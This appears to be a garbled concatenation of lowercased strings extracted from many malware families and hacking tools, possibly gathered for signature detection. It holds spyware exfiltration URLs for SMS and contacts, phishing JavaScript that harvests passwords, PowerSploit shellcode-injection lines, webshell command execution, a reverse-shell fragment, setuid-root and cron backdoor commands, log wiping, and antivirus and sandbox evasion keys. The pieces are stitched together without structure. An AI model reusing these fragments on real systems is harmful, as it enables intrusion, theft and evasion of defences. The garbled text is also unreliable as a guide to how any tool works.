444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
1 winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
1 .iiswebvirtualdirroot[host ] [user ] [pass ] .anonymoususername.anonymoususerpassthe_white_lf_x@hotmail.comautogeneratecolumns=\"false\" onitemcommand=\"filesystem_itemcommand\"<asp:linkbutton id=\"lnkexec\" runat=\"server\" onclick=\"lnkexec_click\">[execute<asp:label id=\"uip\" runat=\"server\" text=\"your ip :\" forecolor=\"#ff8300\"></asp:label>autorun.infravmon.exelasttimekey.inicsdownupdatecsdownversioncsdownloadcsexit
1 proxy_info: automatic proxy url => %s proxy_info: connection type => %d proxy_info: proxy server => %s proxy_info: bypass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
1 -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 reflectivepick_x64.dll$result = $minidumpwritedump.invoke($null, @($processhandle,$processfilename = \"$($processname)_$($processid).dmp\"invoke-psexeccmd\"[*] executing service .exe$cmd = \"%comspec% /c echo $command ^> %systemroot%\\temp\\# upload to a specified exfil uriserver path to exfil to.[*] pdc: lab-2008-dc1.lab.com$attempts = get-userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
1 password <=14/%ldn.txtkill you\x00d
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 danderspritzdanderspritzchimneypool addresgetting remote timeretrievedadded ops library to python search pathtarget: z0.0.0.1psp_avoidancepassworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 \x00netpass update\x00\x00%s:download\x00\x00%s:update\x00\x00%s:uninstall\x00?injectdll@@yahpauhwnd__@@k@z?unmapdll@@yahxz?g_bsubclassed@@3haacfg92kxpcso4y94bnurfmnnk27ehw6cqp5entad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75baa77c842be168b0f66c42c7885997b523f63566f407f3834bcc54aaa32524svwf
1 guntbypass
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 iofreemdlkfreleasespinlock<shortdescription>keystroke collector</shortdescription>this plugin is the e_qwerty kernel mode driver for logging keys.</description><commands/></version><associatedimplantid>20121</associatedimplantid><rightsrequired>system or administrator (if administrator, i think the driverins<platforms>windows nt, windows 2000, windows xp (32/64 bit), windows 2003 (32/64<projectpath>plugin/collection</projectpath><dlldepend>none</dlldepend><minortype>0</minortype><pluginname>e_qwertykm</pluginname></comments><comments><majortype>1</majortype><files>none</files><poc>erebus</poc><team>none</team><?xml-stylesheet type=\"text/xsl\" href=\"../xslt/pluginhtml.xsl\"?><pluginsdepend>u_hookmanager v1.0, kernel covert store v1.0</pluginsdepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsiwarriorpride\\production2.0\\package\\e_wzowski<!-- edited with xmlspy v5 rel. 4 u (http://www.xmlspy.com) by team (renegade) -<configfilename>20123_cmddef.xml</configfilename><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
1 .rsrcheapfreeconvertstringsidtosidallocatelocallyuniqueidadvapi32.dlllsalookupauthenticationpackagemsvcr120.dll\x12f\x12f\x129\x12e\x12a\x12e\x12b\x12a\x12-\x127\x127\x128\x123\x12\x121\x12d\x128\x123\x12b\x122\x12e\x128\x12-\x12b\x122\x123\x12d\x12ezcobl\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x12620110113144935bitsadmin /transferdel rm.batav_list=
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 \x00msvcrt.dll\x00\x00crtdll.dll\x00cygwin1.dllcygwin_internalcygwin_detach_dllmsvcrt.dllmingw-w64 runtime failure:-libgccw32-eh-3-sjlj-gthr-mingw32_mingw32_init_mainargs-libgccw32-eh-2-sjlj-gthr-mingw32mingw runtime failure:autoit has detected the stack has become corrupt.\n\nstack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nautoit supports the __stdcall (winapi) and __cdecl calling conventions. the __stdcall (winapi) convention is used by default but __cdecl can be used instead. see the dllcall() documentation for details on changing the calling convention.autoit errormissing right bracket ')' in expression.missing operator in expression.unbalanced brackets in expression.error parsing function call.>>>autoit no cmdexecute<<<#requireadmin#onautoitstartregister#notrayiconcannot parse #include -- terminating\x0d\x0a\x00 -- terminating\x0a\x00crt: \x00unexpected error\x00unhandled exception (main)\x00unhandled exception in thread\x00unable to create thread\x00unable to destroy semaphore\x00unable to wait on semaphore\x00unable to post semaphore\x00unable to init semaphore\x00unable to unlock mutex\x00unable to lock mutex\x00unable to init mutex\x00invalid stream lock number\x00corrupt per-thread data\x00out of memory\x00unable to init threads\x00unable to init heap\x00qt5core.dll\x00\x00qtcore4.dll\x00`
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum 